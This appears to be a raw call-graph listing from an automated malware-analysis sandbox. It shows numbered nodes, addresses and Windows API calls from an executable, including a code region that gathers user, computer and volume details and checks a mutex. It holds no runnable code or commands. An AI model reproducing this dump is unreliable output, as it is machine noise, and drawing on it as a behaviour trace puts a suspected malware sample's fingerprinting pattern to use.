109812->109840 109814 425310 109828 425332 LeaveCriticalSection LeaveCriticalSection _fseek 109814->109828 109815 43085f 109836 4385a1 109815->109836 109817->109810 109823 4307fc 109817->109823 109841 4237cb 60 API calls 3 library calls 109817->109841 109819 4307f5 109819->109823 109842 4237cb 60 API calls 3 library calls 109819->109842 109821 430814 109821->109823 109843 4237cb 60 API calls 3 library calls 109821->109843 109823->109810 109823->109815 109824->109779 109825->109789 109826->109789 109827->109789 109828->109789 109835 429d75 LeaveCriticalSection 109829->109835 109831 430605 109831->109805 109832->109797 109833->109797 109834->109806 109835->109831 109844 437d85 109836->109844 109838 4385ba 109838->109814 109839->109812 109840->109814 109841->109819 109842->109821 109843->109823 109845 437d91 __close 109844->109845 109846 437da7 109845->109846 109848 437ddd 109845->109848 109847 428b28 __tolower_l 58 API calls 109846->109847 109849 437dac 109847->109849 109850 437e4e __wsopen_nolock 109 API calls 109848->109850 109851 428db6 ___crtsetenv 9 API calls 109849->109851 109852 437df9 109850->109852 109854 437db6 __close 109851->109854 109853 437e22 __wsopen_helper LeaveCriticalSection 109852->109853 109853->109854 109854->109838 109856 404b83 109855->109856 109857 404c3f LoadLibraryA 109855->109857 109856->109737 109856->109738 109857->109856 109858 404c50 GetProcAddress 109857->109858 109858->109856 109860 420db6 Mailbox 59 API calls 109859->109860 109861 405240 109860->109861 109861->109743 109863 404ea3 FindResourceExW 109862->109863 109865 404ec0 109862->109865 109864 43d933 LoadResource 109863->109864 109863->109865 109864->109865 109866 43d948 SizeofResource 109864->109866 109865->109749 109866->109865 109867 43d95c LockResource 109866->109867 109867->109865 109869 404ef4 109868->109869 109870 43d9ab 109868->109870 109874 42584d 109869->109874 109872 404f02 109872->109755 109873->109749 109875 425859 __close 109874->109875 109876 42586b 109875->109876 109877 425891 109875->109877 109887 428b28 58 API calls __getptd_noexit 109876->109887 109889 426c11 109877->109889 109879 425870 109888 428db6 9 API calls ___crtsetenv 109879->109888 109884 4258a6 109896 4258c8 LeaveCriticalSection LeaveCriticalSection _fseek 109884->109896 109886 42587b __close 109886->109872 109887->109879 109888->109886 109890 426c43 EnterCriticalSection 109889->109890 109891 426c21 109889->109891 109893 425897 109890->109893 109891->109890 109892 426c29 109891->109892 109894 429c0b __lock 58 API calls 109892->109894 109895 4257be 83 API calls 5 library calls 109893->109895 109894->109893 109895->109884 109896->109886 109900 4255fd 109897->109900 109899 404f2e 109899->109763 109901 425609 __close 109900->109901 109902 42561f _memset 109901->109902 109903 42564c 109901->109903 109905 425644 __close 109901->109905 109913 428b28 58 API calls __getptd_noexit 109902->109913 109904 426c11 __lock_file 59 API calls 109903->109904 109906 425652 109904->109906 109905->109899 109915 42541d 72 API calls 7 library calls 109906->109915 109909 425639 109914 428db6 9 API calls ___crtsetenv 109909->109914 109910 425668 109916 425686 LeaveCriticalSection LeaveCriticalSection _fseek 109910->109916 109913->109909 109914->109905 109915->109910 109916->109905 109920 42520a GetSystemTimeAsFileTime 109917->109920 109919 468f6e 109919->109765 109921 425238 __aulldiv 109920->109921 109921->109919 109923 425c6c __close 109922->109923 109924 425c93 109923->109924 109925 425c7e 109923->109925 109927 426c11 __lock_file 59 API calls 109924->109927 109936 428b28 58 API calls __getptd_noexit 109925->109936 109929 425c99 109927->109929 109928 425c83 109937 428db6 9 API calls ___crtsetenv 109928->109937 109938 4258d0 67 API calls 7 library calls 109929->109938 109932 425ca4 109939 425cc4 LeaveCriticalSection LeaveCriticalSection _fseek 109932->109939 109933 425c8e __close 109933->109770 109935 425cb6 109935->109933 109936->109928 109937->109933 109938->109932 109939->109935 109941 407da6 109940->109941 109943 407d99 109940->109943 109942 420db6 Mailbox 59 API calls 109941->109942 109942->109943 109943->109549 109944->109577 109946 407a5f 109945->109946 109950 407a85 _memmove 109945->109950 109947 420db6 Mailbox 59 API calls 109946->109947 109946->109950 109948 407ad4 109947->109948 109949 420db6 Mailbox 59 API calls 109948->109949 109949->109950 109950->109591 109951->109590 109987 469748 __tzset_nolock _wcscmp 109984->109987 109985 404f0b 74 API calls 109985->109987 109986 469109 GetSystemTimeAsFileTime 109986->109987 109987->109985 109987->109986 109988 469210 109987->109988 109989 404ee5 85 API calls 109987->109989 109988->109665 109990 4240fb 58 API calls __wsplitpath_helper 109988->109990 109989->109987 109990->109668 109991->109677 110258 407c5f __wsetenvp 110257->110258 110259 408029 59 API calls 110258->110259 110260 407c70 _memmove 110258->110260 110261 43ed07 _memmove 110259->110261 110260->109710 110262->109721 110263->109293 110264->109290 110265->109304 110266->109303 110267->109308 110268->109317 110269->109319 110270->109323 110271->109053 110272->109050 110273->108943 110274->108943 110275->108934 110276->108927 110277->108928 110278->108927 110279->108964 110280->108969 110281 401066 110286 40f76f 110281->110286 110283 40106c 110284 422d40 __cinit 67 API calls 110283->110284 110285 401076 110284->110285 110287 40f790 110286->110287 110319 41ff03 110287->110319 110291 40f7d7 110292 407667 59 API calls 110291->110292 110293 40f7e1 110292->110293 110294 407667 59 API calls 110293->110294 110295 40f7eb 110294->110295 110296 407667 59 API calls 110295->110296 110297 40f7f5 110296->110297 110298 407667 59 API calls 110297->110298 110299 40f833 110298->110299 110300 407667 59 API calls 110299->110300 110301 40f8fe 110300->110301 110329 415f87 110301->110329 110305 40f930 110306 407667 59 API calls 110305->110306 110307 40f93a 110306->110307 110357 41fd9e 110307->110357 110309 40f981 110310 40f991 GetStdHandle 110309->110310 110311 40f9dd 110310->110311 110312 4445ab 110310->110312 110313 40f9e5 OleInitialize 110311->110313 110312->110311 110314 4445b4 110312->110314 110313->110283 110364 466b38 64 API calls Mailbox 110314->110364 110316 4445bb 110365 467207 CreateThread 110316->110365 110318 4445c7 CloseHandle 110318->110313 110366 41ffdc 110319->110366 110322 41ffdc 59 API calls 110323 41ff45 110322->110323 110324 407667 59 API calls 110323->110324 110325 41ff51 110324->110325 110326 407bcc 59 API calls 110325->110326 110327 40f796 110326->110327 110328 420162 6 API calls 110327->110328 110328->110291 110330 407667 59 API calls 110329->110330 110331 415f97 110330->110331 110332 407667 59 API calls 110331->110332 110333 415f9f 110332->110333 110373 415a9d 110333->110373 110336 415a9d 59 API calls 110337 415faf 110336->110337 110338 407667 59 API calls 110337->110338 110339 415fba 110338->110339 110340 420db6 Mailbox 59 API calls 110339->110340 110341 40f908 110340->110341 110342 4160f9 110341->110342 110343 416107 110342->110343 110344 407667 59 API calls 110343->110344 110345 416112 110344->110345 110346 407667 59 API calls 110345->110346 110347 41611d 110346->110347 110348 407667 59 API calls 110347->110348 110349 416128 110348->110349 110350 407667 59 API calls 110349->110350 110351 416133 110350->110351 110352 415a9d 59 API calls 110351->110352 110353 41613e 110352->110353 110354 420db6 Mailbox 59 API calls 110353->110354 110355 416145 RegisterWindowMessageW 110354->110355 110355->110305 110358 45576f 110357->110358 110359 41fdae 110357->110359 110376 469ae7 60 API calls 110358->110376 110361 420db6 Mailbox 59 API calls 110359->110361 110363 41fdb6 110361->110363 110362 45577a 110363->110309 110364->110316 110365->110318 110377 4671ed 65 API calls 110365->110377 110367 407667 59 API calls 110366->110367 110368 41ffe7 110367->110368 110369 407667 59 API calls 110368->110369 110370 41ffef 110369->110370 110371 407667 59 API calls 110370->110371 110372 41ff3b 110371->110372 110372->110322 110374 407667 59 API calls 110373->110374 110375 415aa5 110374->110375 110375->110336 110376->110362 110378 40e4a8 110381 40d100 110378->110381 110380 40e4b6 110382 40d11d 110381->110382 110410 40d37d 110381->110410 110383 4426e0 110382->110383 110384 442691 110382->110384 110414 40d144 110382->110414 110425 47a3e6 341 API calls __cinit 110383->110425 110387 442694 110384->110387 110392 4426af 110384->110392 110388 4426a0 110387->110388 110387->110414 110423 47a9fa 341 API calls 110388->110423 110389 422d40 __cinit 67 API calls 110389->110414 110392->110410 110424 47aea2 341 API calls 3 library calls 110392->110424 110393 40d434 110417 408a52 68 API calls 110393->110417 110394 4428b5 110394->110394 110395 40d54b 110395->110380 110399 40d443 110399->110380 110400 4427fc 110429 47a751 89 API calls 110400->110429 110404 4084c0 69 API calls 110404->110414 110410->110395 110430 469e4a 89 API calls 4 library calls 110410->110430 110411 409ea0 341 API calls 110411->110414 110412 408047 59 API calls 110412->110414 110414->110389 110414->110393 110414->110395 110414->110400 110414->110404 110414->110410 110414->110411 110414->110412 110415 408740 68 API calls __cinit 110414->110415 110416 408542 68 API calls 110414->110416 110418 40843a 68 API calls 110414->110418 110419 40cf7c 341 API calls 110414->110419 110420 409dda 59 API calls Mailbox 110414->110420 110421 40cf00 89 API calls 110414->110421 110422 40cd7d 341 API calls 110414->110422 110426 408a52 68 API calls 110414->110426 110427 409d3c 60 API calls Mailbox 110414->110427 110428 45678d 60 API calls 110414->110428 110415->110414 110416->110414 110417->110399 110418->110414 110419->110414 110420->110414 110421->110414 110422->110414 110423->110395 110424->110410 110425->110414 110426->110414 110427->110414 110428->110414 110429->110410 110430->110394 110431 ac5085 110432 ac506f 110431->110432 110433 ac5089 110431->110433 110436 ae8550 110432->110436 110435 ac5078 110454 ae8556 110436->110454 110437 ae8145 GetLastError 110459 ae7dd7 110437->110459 110438 ae8579 FreeSid 110438->110454 110439 ae8bc1 GetLastError 110439->110454 110440 ae83fb GetUserNameW 110440->110459 110441 ae8209 GetUserNameW 110441->110459 110461 ae7d37 110441->110461 110442 ae8986 SetEntriesInAclW 110442->110454 110443 ae890b LocalFree 110443->110454 110444 ae89cd OpenMutexW 110444->110435 110445 ae8248 110448 ae824a GetLastError 110445->110448 110446 ae7d30 110450 ae7d6c GetVolumeInformationW 110446->110450 110446->110461 110448->110435 110449 ae836e GetLastError 110449->110459 110450->110435 110451 ae7fd4 GetLastError 110451->110459 110452 ae7d20 110452->110446 110452->110450 110455 ae7d83 GetWindowsDirectoryW 110452->110455 110458 ae7e06 GetComputerNameW 110452->110458 110452->110461 110453 ae8599 110453->110446 110456 ae896a wsprintfW 110453->110456 110454->110436 110454->110437 110454->110438 110454->110439 110454->110442 110454->110443 110454->110444 110454->110446 110454->110452 110454->110453 110454->110456 110457 ae8953 AllocateAndInitializeSid 110454->110457 110454->110459 110454->110461 110455->110446 110455->110461 110456->110446 110457->110454 110458->110461 110459->110437 110459->110440 110459->110441 110459->110445 110459->110446 110459->110448 110459->110449 110459->110450 110459->110451 110459->110452 110460 ae7f6b GetVolumeInformationW 110459->110460 110459->110461 110460->110459 110461->110435 110462 44416f 110466 455fe6 110462->110466 110464 44417a 110465 455fe6 85 API calls 110464->110465 110465->110464 110468 455ff3 110466->110468 110476 456020 110466->110476 110467 456022 110478 409328 84 API calls Mailbox 110467->110478 110468->110467 110470 456027 110468->110470 110474 45601a 110468->110474 110468->110476 110471 409837 84 API calls 110470->110471 110472 45602e 110471->110472 110473 407b2e 59 API calls 110472->110473 110473->110476 110477 4095a0 59 API calls _wcsstr 110474->110477 110476->110464 110477->110476 110478->110470 110479 468d0d 110480 468d20 110479->110480 110481 468d1a 110479->110481 110483 468d31 110480->110483 110484 422d55 _free 58 API calls 110480->110484 110482 422d55 _free 58 API calls 110481->110482 110482->110480 110485 468d43 110483->110485 110486 422d55 _free 58 API calls 110483->110486 110484->110483 110486->110485 110487 40e5ab 110488 40d100 341 API calls 110487->110488 110489 40e5b9 110488->110489 110490 acb180 110499 acb0de 110490->110499 110491 acb2a7 SetFilePointerEx 110494 acb1df 110491->110494 110495 acb1c6 110491->110495 110492 acb196 110493 acb3a6 110492->110493 110492->110495 110496 acb328 SetFilePointerEx 110493->110496 110497 acb3b2 110493->110497 110495->110494 110498 acb2e0 WriteFile 110495->110498 110499->110490 110499->110491 110499->110492 110499->110496 110500 acb0d0 SetFilePointerEx 110499->110500 110501 acb253 110499->110501 110500->110499 110502 acb054 110500->110502 110503 ac7b22 110504 ac7b2b 110503->110504 110505 ac5f10 110503->110505 110506 ac6084 SetFilePointerEx 110505->110506 110507 ac5d90 110505->110507 110506->110505 110508 403633 110509 40366a 110508->110509 110510 4036e7 110509->110510 110511 403688 110509->110511 110546 4036e5 110509->110546 110515 4036ed 110510->110515 110516 43d0cc 110510->110516 110512 403695 110511->110512 110513 40374b PostQuitMessage 110511->110513 110518 4036a0 110512->110518 110519 43d154 110512->110519 110550 4036d8 110513->110550 110514 4036ca DefWindowProcW 110514->110550 110520 4036f2 110515->110520 110521 403715 SetTimer RegisterWindowMessageW 110515->110521 110557 411070 10 API calls Mailbox 110516->110557 110523 403755 110518->110523 110524 4036a8 110518->110524 110573 462527 71 API calls _memset 110519->110573 110527 4036f9 KillTimer 110520->110527 110528 43d06f 110520->110528 110525 40373e CreatePopupMenu 110521->110525 110521->110550 110522 43d0f3 110558 411093 341 API calls Mailbox 110522->110558 110555 4044a0 64 API calls _memset 110523->110555 110530 4036b3 110524->110530 110531 43d139 110524->110531 110525->110550 110553 40443a Shell_NotifyIconW _memset 110527->110553 110534 43d074 110528->110534 110535 43d0a8 MoveWindow 110528->110535 110538 43d124 110530->110538 110543 4036be 110530->110543 110531->110514 110572 457c36 59 API calls Mailbox 110531->110572 110532 43d166 110532->110514 110532->110550 110539 43d097 SetFocus 110534->110539 110540 43d078 110534->110540 110535->110550 110537 40370c 110554 403114 DeleteObject DestroyWindow Mailbox 110537->110554 110571 462d36 81 API calls _memset 110538->110571 110539->110550 110540->110543 110544 43d081 110540->110544 110543->110514 110559 40443a Shell_NotifyIconW _memset 110543->110559 110556 411070 10 API calls Mailbox 110544->110556 110546->110514 110548 403764 110548->110550 110551 43d118 110560 40434a 110551->110560 110553->110537 110554->110550 110555->110548 110556->110550 110557->110522 110558->110543 110559->110551 110561 404375 _memset 110560->110561 110574 404182 110561->110574 110565 4043fa 110566 404430 Shell_NotifyIconW 110565->110566 110567 404414 Shell_NotifyIconW 110565->110567 110568 404422 110566->110568 110567->110568 110578 40407c 110568->110578 110570 404429 110570->110546 110571->110548 110572->110546 110573->110532 110575 43d423 110574->110575 110576 404196 110574->110576 110575->110576 110577 43d42c DestroyIcon 110575->110577 110576->110565 110600 462f94 62 API calls _W_store_winword 110576->110600 110577->110576 110579 404098 110578->110579 110580 40416f Mailbox 110578->110580 110581 407a16 59 API calls 110579->110581 110580->110570 110582 4040a6 110581->110582 110583 4040b3 110582->110583 110584 43d3c8 LoadStringW 110582->110584 110585 407bcc 59 API calls 110583->110585 110587 43d3e2 110584->110587 110586 4040c8 110585->110586 110586->110587 110589 4040d9 110586->110589 110588 407b2e 59 API calls 110587->110588 110594 43d3ec 110588->110594 110590 4040e3 110589->110590 110591 404174 110589->110591 110592 407b2e 59 API calls 110590->110592 110593 408047 59 API calls 110591->110593 110596 4040ed _memset _wcscpy 110592->110596 110593->110596 110595 407cab 59 API calls 110594->110595 110594->110596 110597 43d40e 110595->110597 110598 404155 Shell_NotifyIconW 110596->110598 110599 407cab 59 API calls 110597->110599 110598->110580 110599->110596 110600->110565 110601 427c56 110602 427c62 110601->110602 110638 429e08 GetStartupInfoW 110602->110638 110605 427c67 110640 428b7c GetProcessHeap 110605->110640 110606 427cbf 110607 427cca 110606->110607 110723 427da6 58 API calls 3 library calls 110606->110723 110641 429ae6 110607->110641 110610 427cd0 110611 427cdb __RTC_Initialize 110610->110611 110724 427da6 58 API calls 3 library calls 110610->110724 110662 42d5d2 110611->110662 110614 427cea 110615 427cf6 GetCommandLineW 110614->110615 110725 427da6 58 API calls 3 library calls 110614->110725 110681 434f23 GetEnvironmentStringsW 110615->110681 110618 427cf5 110618->110615 110621 427d10 110622 427d1b 110621->110622 110726 4230b5 58 API calls 3 library calls 110621->110726 110691 434d58 110622->110691 110625 427d21 110626 427d2c 110625->110626 110727 4230b5 58 API calls 3 library calls 110625->110727 110705 4230ef 110626->110705 110629 427d34 110630 427d3f __wwincmdln 110629->110630 110728 4230b5 58 API calls 3 library calls 110629->110728 110711 4047d0 110630->110711 110633 427d53 110634 427d62 110633->110634 110729 423358 58 API calls _doexit 110633->110729 110730 4230e0 58 API calls _doexit 110634->110730 110637 427d67 __close 110639 429e1e 110638->110639 110639->110605 110640->110606 110731 423187 36 API calls 2 library calls 110641->110731 110643 429aeb 110732 429d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 110643->110732 110645 429af0 110646 429af4 110645->110646 110734 429d8a TlsAlloc 110645->110734 110733 429b5c 61 API calls 2 library calls 110646->110733 110649 429b06 110649->110646 110651 429b11 110649->110651 110650 429af9 110650->110610 110735 4287d5 110651->110735 110654 429b53 110743 429b5c 61 API calls 2 library calls 110654->110743 110657 429b32 110657->110654 110659 429b38 110657->110659 110658 429b58 110658->110610 110742 429a33 58 API calls 4 library calls 110659->110742 110661 429b40 GetCurrentThreadId 110661->110610 110663 42d5de __close 110662->110663 110664 429c0b __lock 58 API calls 110663->110664 110665 42d5e5 110664->110665 110666 4287d5 __calloc_crt 58 API calls 110665->110666 110667 42d5f6 110666->110667 110668 42d661 GetStartupInfoW 110667->110668 110669 42d601 __close @_EH4_CallFilterFunc@8 110667->110669 110675 42d7a5 110668->110675 110677 42d676 110668->110677 110669->110614 110670 42d86d 110757 42d87d LeaveCriticalSection _doexit 110670->110757 110672 42d6c4 110672->110675 110678 42d6f8 GetFileType 110672->110678 110755 429e2b InitializeCriticalSectionAndSpinCount 110672->110755 110673 4287d5 __calloc_crt 58 API calls 110673->110677 110674 42d7f2 GetStdHandle 110674->110675 110675->110670 110675->110674 110676 42d805 GetFileType 110675->110676 110756 429e2b InitializeCriticalSectionAndSpinCount 110675->110756 110676->110675 110677->110672 110677->110673 110677->110675 110678->110672 110682 427d06 110681->110682 110683 434f34 110681->110683 110687 434b1b GetModuleFileNameW 110682->110687 110684 42881d __malloc_crt 58 API calls 110683->110684 110685 434f5a _memmove 110684->110685 110686 434f70 FreeEnvironmentStringsW 110685->110686 110686->110682 110688 434b4f _wparse_cmdline 110687->110688 110689 42881d __malloc_crt 58 API calls 110688->110689 110690 434b8f _wparse_cmdline 110688->110690 110689->110690 110690->110621 110692 434d71 __wsetenvp 110691->110692 110693 434d69 110691->110693 110694 4287d5 __calloc_crt 58 API calls 110692->110694 110693->110625 110695 434d9a __wsetenvp 110694->110695 110695->110693 110697 4287d5 __calloc_crt 58 API calls 110695->110697 110698 434df1 110695->110698 110699 434e16 110695->110699 110702 434e2d 110695->110702 110758 434607 58 API calls 2 library calls 110695->110758 110696 422d55 _free 58 API calls 110696->110693 110697->110695 110698->110696 110701 422d55 _free 58 API calls 110699->110701 110701->110693 110759 428dc6 IsProcessorFeaturePresent 110702->110759 110704 434e39 110704->110625 110706 4230fb __IsNonwritableInCurrentImage 110705->110706 110774 42a4d1 110706->110774 110708 423119 __initterm_e 110709 422d40 __cinit 67 API calls 110708->110709 110710 423138 __cinit __IsNonwritableInCurrentImage 110708->110710 110709->110710 110710->110629 110712 4047ea 110711->110712 110722 404889 110711->110722 110713 404824 IsThemeActive 110712->110713 110777 42336c 110713->110777 110717 404850 110789 4048fd SystemParametersInfoW SystemParametersInfoW 110717->110789 110719 40485c 110790 403b3a 110719->110790 110721 404864 SystemParametersInfoW 110721->110722 110722->110633 110723->110607 110724->110611 110725->110618 110729->110634 110730->110637 110731->110643 110732->110645 110733->110650 110734->110649 110737 4287dc 110735->110737 110738 428817 110737->110738 110740 4287fa 110737->110740 110744 4351f6 110737->110744 110738->110654 110741 429de6 TlsSetValue 110738->110741 110740->110737 110740->110738 110752 42a132 Sleep 110740->110752 110741->110657 110742->110661 110743->110658 110745 435201 110744->110745 110750 43521c 110744->110750 110746 43520d 110745->110746 110745->110750 110753 428b28 58 API calls __getptd_noexit 110746->110753 110748 43522c HeapAlloc 110749 435212 110748->110749 110748->110750 110749->110737 110750->110748 110750->110749 110754 4233a1 DecodePointer 110750->110754 110752->110740 110753->110749 110754->110750 110755->110672 110756->110675 110757->110669 110758->110695 110760 428dd1 110759->110760 110765 428c59 110760->110765 110764 428dec 110764->110704 110766 428c73 _memset __call_reportfault 110765->110766 110767 428c93 IsDebuggerPresent 110766->110767 110773 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 110767->110773 110769 428d57 __call_reportfault 110770 42c5f6 __crtCompareStringA_stat 6 API calls 110769->110770 110771 428d7a 110770->110771 110772 42a140 GetCurrentProcess TerminateProcess 110771->110772 110772->110764 110773->110769 110775 42a4d4 EncodePointer 110774->110775 110775->110775 110776 42a4ee 110775->110776 110776->110708 110778 429c0b __lock 58 API calls 110777->110778 110779 423377 DecodePointer EncodePointer 110778->110779 110842 429d75 LeaveCriticalSection 110779->110842 110781 404849 110782 4233d4 110781->110782 110783 4233f8 110782->110783 110784 4233de 110782->110784 110783->110717 110784->110783 110843 428b28 58 API calls __getptd_noexit 110784->110843 110786 4233e8 110844 428db6 9 API calls ___crtsetenv 110786->110844 110788 4233f3 110788->110717 110789->110719 110791 403b47 __ftell_nolock 110790->110791 110792 407667 59 API calls 110791->110792 110793 403b51 GetCurrentDirectoryW 110792->110793 110845 403766 110793->110845 110795 403b7a IsDebuggerPresent 110796 43d272 MessageBoxA 110795->110796 110797 403b88 110795->110797 110800 43d28c 110796->110800 110798 403c61 110797->110798 110797->110800 110801 403ba5 110797->110801 110799 403c68 SetCurrentDirectoryW 110798->110799 110802 403c75 Mailbox 110799->110802 110967 407213 59 API calls Mailbox 110800->110967 110926 407285 110801->110926 110802->110721 110805 43d29c 110810 43d2b2 SetCurrentDirectoryW 110805->110810 110810->110802 110842->110781 110843->110786 110844->110788 110846 407667 59 API calls 110845->110846 110847 40377c 110846->110847 110976 403d31 110847->110976 110849 40379a 110850 404706 61 API calls 110849->110850 110851 4037ae 110850->110851 110852 407de1 59 API calls 110851->110852 110853 4037bb 110852->110853 110854 404ddd 136 API calls 110853->110854 110855 4037d4 110854->110855 110856 43d173 110855->110856 110857 4037dc Mailbox 110855->110857 111018 46955b 110856->111018 110861 408047 59 API calls 110857->110861 110860 43d192 110863 422d55 _free 58 API calls 110860->110863 110864 4037ef 110861->110864 110862 404e4a 84 API calls 110862->110860 110865 43d19f 110863->110865 110990 40928a 110864->110990 110867 404e4a 84 API calls 110865->110867 110869 43d1a8 110867->110869 110873 403ed0 59 API calls 110869->110873 110870 407de1 59 API calls 110871 403808 110870->110871 110872 4084c0 69 API calls 110871->110872 110874 40381a Mailbox 110872->110874 110875 43d1c3 110873->110875 110876 407de1 59 API calls 110874->110876 110878 403ed0 59 API calls 110875->110878 110877 403840 110876->110877 110880 4084c0 69 API calls 110877->110880 110879 43d1df 110878->110879 110881 404706 61 API calls 110879->110881 110883 40384f Mailbox 110880->110883 110882 43d204 110881->110882 110884 403ed0 59 API calls 110882->110884 110886 407667 59 API calls 110883->110886 110885 43d210 110884->110885 110887 408047 59 API calls 110885->110887 110888 40386d 110886->110888 110889 43d21e 110887->110889 110993 403ed0 110888->110993 110891 403ed0 59 API calls 110889->110891 110893 43d22d 110891->110893 110900 408047 59 API calls 110893->110900 110895 403887 110895->110869 110896 403891 110895->110896 110897 422efd _W_store_winword 60 API calls 110896->110897 110898 40389c 110897->110898 110898->110875 110899 4038a6 110898->110899 110902 422efd _W_store_winword 60 API calls 110899->110902 110901 43d24f 110900->110901 110903 403ed0 59 API calls 110901->110903 110904 4038b1 110902->110904 110905 43d25c 110903->110905 110904->110879 110906 4038bb 110904->110906 110905->110905 110907 422efd _W_store_winword 60 API calls 110906->110907 110908 4038c6 110907->110908 110908->110893 110909 403907 110908->110909 110911 403ed0 59 API calls 110908->110911 110909->110893 110910 403914 110909->110910 110912 4092ce 59 API calls 110910->110912 110913 4038ea 110911->110913 110914 403924 110912->110914 110915 408047 59 API calls 110913->110915 110916 409050 59 API calls 110914->110916 110917 4038f8 110915->110917 110918 403932 110916->110918 110919 403ed0 59 API calls 110917->110919 111009 408ee0 110918->111009 110919->110909 110921 40928a 59 API calls 110923 40394f 110921->110923 110922 408ee0 60 API calls 110922->110923 110923->110921 110923->110922 110924 403ed0 59 API calls 110923->110924 110925 403995 Mailbox 110923->110925 110924->110923 110925->110795 110927 407292 __ftell_nolock 110926->110927 110928 43ea22 _memset 110927->110928 110929 4072ab 110927->110929 110932 43ea3e GetOpenFileNameW 110928->110932 111065 404750 110929->111065 110934 43ea8d 110932->110934 110935 407bcc 59 API calls 110934->110935 110937 43eaa2 110935->110937 110937->110937 110939 4072c9 111093 40686a 110939->111093 110967->110805 110977 403d3e __ftell_nolock 110976->110977 110978 407bcc 59 API calls 110977->110978 110983 403ea4 Mailbox 110977->110983 110980 403d70 110978->110980 110979 4079f2 59 API calls 110979->110980 110980->110979 110988 403da6 Mailbox 110980->110988 110981 4079f2 59 API calls 110981->110988 110982 403e77 110982->110983 110984 407de1 59 API calls 110982->110984 110983->110849 110986 403e98 110984->110986 110985 407de1 59 API calls 110985->110988 110987 403f74 59 API calls 110986->110987 110987->110983 110988->110981 110988->110982 110988->110983 110988->110985 111053 403f74 110988->111053 110991 420db6 Mailbox 59 API calls 110990->110991 110992 4037fb 110991->110992 110992->110870 110994 403ef3 110993->110994 110995 403eda 110993->110995 110997 407bcc 59 API calls 110994->110997 110996 408047 59 API calls 110995->110996 110998 403879 110996->110998 110997->110998 110999 422efd 110998->110999 111000 422f09 110999->111000 111001 422f7e 110999->111001 111008 422f2e 111000->111008 111059 428b28 58 API calls __getptd_noexit 111000->111059 111061 422f90 60 API calls 4 library calls 111001->111061 111004 422f8b 111004->110895 111005 422f15 111060 428db6 9 API calls ___crtsetenv 111005->111060 111007 422f20 111007->110895 111008->110895 111010 43f17c 111009->111010 111015 408ef7 111009->111015 111010->111015 111063 408bdb 59 API calls Mailbox 111010->111063 111012 409040 111062 409d3c 60 API calls Mailbox 111012->111062 111013 408ff8 111016 420db6 Mailbox 59 API calls 111013->111016 111015->111012 111015->111013 111017 408fff 111015->111017 111016->111017 111017->110923 111019 404ee5 85 API calls 111018->111019 111020 4695ca 111019->111020 111021 469734 96 API calls 111020->111021 111022 4695dc 111021->111022 111023 404f0b 74 API calls 111022->111023 111052 43d186 111022->111052 111024 4695f7 111023->111024 111025 404f0b 74 API calls 111024->111025 111026 469607 111025->111026 111027 404f0b 74 API calls 111026->111027 111028 469622 111027->111028 111029 404f0b 74 API calls 111028->111029 111030 46963d 111029->111030 111031 404ee5 85 API calls 111030->111031 111032 469654 111031->111032 111033 42571c __crtCompareStringA_stat 58 API calls 111032->111033 111034 46965b 111033->111034 111035 42571c __crtCompareStringA_stat 58 API calls 111034->111035 111036 469665 111035->111036 111037 404f0b 74 API calls 111036->111037 111038 469679 111037->111038 111039 469109 GetSystemTimeAsFileTime 111038->111039 111040 46968c 111039->111040 111041 4696b6 111040->111041 111042 4696a1 111040->111042 111044 4696bc 111041->111044 111045 46971b 111041->111045 111043 422d55 _free 58 API calls 111042->111043 111046 4696a7 111043->111046 111064 468b06 116 API calls __fcloseall 111044->111064 111048 422d55 _free 58 API calls 111045->111048 111049 422d55 _free 58 API calls 111046->111049 111048->111052 111049->111052 111050 469713 111051 422d55 _free 58 API calls 111050->111051 111051->111052 111052->110860 111052->110862 111054 403f82 111053->111054 111058 403fa4 _memmove 111053->111058 111056 420db6 Mailbox 59 API calls 111054->111056 111055 420db6 Mailbox 59 API calls 111057 403fb8 111055->111057 111056->111058 111057->110988 111058->111055 111059->111005 111060->111007 111061->111004 111062->111017 111063->111015 111064->111050 111127 431940 111065->111127 111068 404799 111071 407d8c 59 API calls 111068->111071 111069 40477c 111070 407bcc 59 API calls 111069->111070 111072 404788 111070->111072 111071->111072 111129 407726 111072->111129 111075 420791 111076 431940 __ftell_nolock 111075->111076 111077 42079e GetLongPathNameW 111076->111077 111078 407bcc 59 API calls 111077->111078 111079 4072bd 111078->111079 111080 40700b 111079->111080 111081 407667 59 API calls 111080->111081 111082 40701d 111081->111082 111083 404750 60 API calls 111082->111083 111084 407028 111083->111084 111085 407033 111084->111085 111086 43e885 111084->111086 111088 403f74 59 API calls 111085->111088 111090 43e89f 111086->111090 111139 407908 61 API calls 111086->111139 111089 40703f 111088->111089 111133 4034c2 111089->111133 111092 407052 Mailbox 111092->110939 111094 404ddd 136 API calls 111093->111094 111095 40688f 111094->111095 111128 40475d GetFullPathNameW 111127->111128 111128->111068 111128->111069 111130 407734 111129->111130 111131 407d2c 59 API calls 111130->111131 111132 404794 111131->111132 111132->111075 111134 4034d4 111133->111134 111138 4034f3 _memmove 111133->111138 111137 420db6 Mailbox 59 API calls 111134->111137 111135 420db6 Mailbox 59 API calls 111136 40350a 111135->111136 111136->111092 111137->111138 111138->111135 111139->111086 111292 401055 111297 402649 111292->111297 111295 422d40 __cinit 67 API calls 111296 401064 111295->111296 111298 407667 59 API calls 111297->111298 111299 4026b7 111298->111299 111304 403582 111299->111304 111302 402754 111303 40105a 111302->111303 111307 403416 59 API calls 2 library calls 111302->111307 111303->111295 111308 4035b0 111304->111308 111307->111302 111309 4035bd 111308->111309 111310 4035a1 111308->111310 111309->111310 111311 4035c4 RegOpenKeyExW 111309->111311 111310->111302 111311->111310 111312 4035de RegQueryValueExW 111311->111312 111313 403614 RegCloseKey 111312->111313 111314 4035ff 111312->111314 111313->111310 111314->111313 111315 401016 111320 404974 111315->111320 111318 422d40 __cinit 67 API calls 111319 401025 111318->111319 111321 420db6 Mailbox 59 API calls 111320->111321 111322 40497c 111321->111322 111323 40101b 111322->111323 111327 404936 111322->111327 111323->111318 111328 404951 111327->111328 111329 40493f 111327->111329 111331 4049a0 111328->111331 111330 422d40 __cinit 67 API calls 111329->111330 111330->111328 111332 407667 59 API calls 111331->111332 111333 4049b8 GetVersionExW 111332->111333 111334 407bcc 59 API calls 111333->111334 111335 4049fb 111334->111335 111336 407d2c 59 API calls 111335->111336 111345 404a28 111335->111345 111337 404a1c 111336->111337 111338 407726 59 API calls 111337->111338 111338->111345 111339 404a93 GetCurrentProcess IsWow64Process 111341 404aac 111339->111341 111340 43d864 111342 404ac2 111341->111342 